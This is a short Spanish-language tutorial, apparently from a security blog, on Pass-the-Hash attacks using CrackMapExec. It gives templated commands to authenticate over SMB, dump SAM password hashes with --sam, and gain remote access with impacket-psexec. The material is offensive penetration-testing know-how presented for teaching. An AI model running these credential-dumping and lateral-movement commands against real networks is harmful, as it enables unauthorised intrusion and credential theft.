Pass the Hash Attacks - CrackMapExec 🐙🗺️

 

Sobre el ataque:

Pass The Hash es una técnica mediante la cual un atacante captura un hash de contraseña a diferencia de los caracteres de contraseña y luego simplemente lo pasa para autenticación y acceso potencialmente lateral a otros sistemas en red.

 


Sobre la herramienta:

CrackMapExec o CME es una herramienta escrita en Python diseñada para la post-explotación en entornos Windows, su principal característica es que permite hacer movimientos laterales dentro una red local. Pero también tiene muchas opciones de uso, ya que usa módulos y funcionalidades externas. Permite 5 protocolos de ataque: smb, winrm, ssh, http o mssql.

 


Ejemplo práctico:

 

En primer lugar, instalamos crackmapexec clonando el repositorio con el siguiente comando:

❯ apt install crackmapexec


O através de su repositorio

 ❯ git clone https://github.com/Porchetta-Industries/CrackMapExec

 

 image

 

Ejecutaremos crackmapexec junto con el protocolo, la ip e indicando -u para el usuario, -d para el dominio y -p para password obtenidos en anteriores artículos.

❯ crackmapexec smb <IP_DOMINIO> -u <USUARIO> -d <DOMINIO> -p <PASSWORD>

 

Como vemos a continuación nos devuelve Pwned para los siguientes usuarios locales:

image

 

También podemos volcar como ejemplo los hashes SAM

Añadiendo al comando anterior la opción --sam

❯ crackmapexec smb <IP_DOMINIO> -u <USUARIO> -d <DOMINIO> -p <PASSWORD> --sam



Y así de sencillo podemos obtener los hashes SAM de un dominio, con esto podríamos usar psexec para obtener acceso al equipo que queramos

❯ impacket-psexec <DOMINIO>/<USUARIO>:<PASSWORD>@<IP_DOMINIO>



Licencia de Creative Commons

Este obra está bajo una licencia de Creative Commons Reconocimiento-NoComercial-CompartirIgual 4.0 Internacional.